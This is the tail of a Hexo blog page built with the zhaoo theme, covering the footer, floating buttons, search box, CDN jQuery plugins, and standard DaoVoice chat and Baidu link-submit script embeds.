        href="mailto:1145020611@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
    <div class="fab fab-daovoice">
      <i class="iconfont iconcomment"></i>
    </div>
  
  
    <a href="https://support.qq.com/product/325288# app_id" target="_blank">
      <div class="fab fab-tencent-chao">
        <i class="iconfont iconcomment"></i>
      </div>
    </a>
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
    <div class="search">
  <div class="search-container">
    <div class="search-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <div class="search-input-wrapper">
      <i class="search-input-icon iconfont iconsearch"></i>
      <input class="search-input" type="search" id="search-input" placeholder="Search..." autofocus autocomplete="off"
        autocorrect="off" autocapitalize="off">
    </div>
    <div class="search-output" id="search-output"></div>
  </div>
</div>
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>





  

<script>
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
  })(window, document, "script", "https://widget.daovoice.io/widget/0f81ff2f.js", "daovoice")
  daovoice('init', {
    app_id: "3abd194f# app_id"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>



  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>